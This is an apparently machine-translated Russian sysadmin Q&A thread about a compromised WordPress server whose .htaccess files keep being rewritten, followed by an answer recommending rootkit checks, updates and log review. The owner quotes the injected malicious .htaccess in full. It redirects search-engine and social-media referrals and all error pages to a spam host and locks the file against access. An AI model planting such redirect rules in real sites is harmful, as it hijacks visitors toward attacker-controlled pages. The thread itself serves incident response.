Возможный дубликат:
Мой сервер был взломан в АВАРИИ
Кажется, существует вредоносный сценарий, который обращается к моему серверу и редактирует файлы .htaccess для всех моих размещенных сайтов для перенаправления на спам-ссылки.
Как лучше всего этого не допустить?
Я изменил данные доступа к серверу, как для панели управления, так и для доступа по FTP, и попытался обновить существующие файлы .htaccess с помощью следующего кода, но он все еще меняется.
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
# protect wp-config.php
<files wp-config.php>
Order deny,allow
Deny from all
</files>
# Protect the htaccess file
<files .htaccess>
order allow,deny
deny from all
</files>
# protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
Что еще могло бы помочь?
Извините за отсутствие информации, я новичок в серверах и т. Д., Поэтому, если требуются какие-либо дополнительные сведения, просто кричите!
Заранее благодарю за любую помощь.
Дэн
******* РЕДАКТИРОВАТЬ *******
Вредоносный .htaccess по запросу
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://byidelement.ru/ruby/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://byidelement.ru/ruby/index.php [R=301,L]
</IfModule>
# STRONG HTACCESS PROTECTION</code>
<Files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
satisfy all
</Files>
# protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
ErrorDocument 400 http://byidelement.ru/ruby/index.php
ErrorDocument 401 http://byidelement.ru/ruby/index.php
ErrorDocument 403 http://byidelement.ru/ruby/index.php
ErrorDocument 404 http://byidelement.ru/ruby/index.php
ErrorDocument 500 http://byidelement.ru/ruby/index.php
Бегать chkrootkit поскорее, на всякий случай.
Убедитесь, что все пакеты обновлены с исправлениями безопасности:
apt-get update; apt-get dist-upgrade
yum upgrade
Вполне вероятно, что это известный эксплойт в версии Wordpress (или какой-либо другой готовой среды), которую вы используете, и теперь обнаруживается, что он снова и снова используется удаленно. Если это так, найдите последнюю версию всех используемых вами фреймворков и проверьте исправления безопасности.
Предполагая, что он эксплуатируется удаленно, это можно подтвердить, получив tail
запущенный на веб-сервере, доступ к журналам и отслеживание любой подозрительной активности. tail -f /var/log/apache2/access-log
будет командой при стандартной установке Ubuntu, но все дистрибутивы размещают свои журналы Apache в разных местах. Когда вы видите что-то подозрительное, вы узнаете, какой VirtualHost был взломан. Если вы любите приключения, просмотрите также свои исторические журналы доступа. Это может показаться сложной задачей на сервере с высоким трафиком, но покажет точку атаки. Сузьте область поиска, начав поиск примерно в то время, когда вы знаете, что произошла первая атака.